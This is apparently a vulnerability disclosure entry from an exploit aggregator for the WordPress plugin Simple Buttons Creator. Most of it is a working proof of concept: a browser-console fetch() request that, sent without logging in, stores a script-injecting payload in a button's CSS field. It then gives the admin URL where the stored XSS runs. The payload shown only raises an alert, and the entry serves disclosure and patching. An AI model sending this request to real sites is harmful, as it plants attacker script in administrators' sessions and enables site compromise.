## https://sploitus.com/exploit?id=WPEX-ID:B7A35C5B-474A-444A-85EE-C50782C7A6C2
As a non-logged in visitor, run the following in the browser console (replace `<<ANY_ID>>` with any number):
```
fetch("/wp-content/plugins/simple-buttons-creator/bt-manage.php?page=sbc-new&method=post", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'button_id=<<ANY_ID>>&bt_name=CSRF909&bt_text=CSRF&bt_link=CSRF&bt_bg_color=CSRF&bt_txt_color=CSRF&bt_font_size=&bt_border_radius=&bt_css=</textarea><script>alert(2)</script>',
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
```
As an admin, go to:
https://example.com/wp-admin/admin.php?page=simple-buttons&method=edit&id=<<ANY_ID>>
and see the XSS.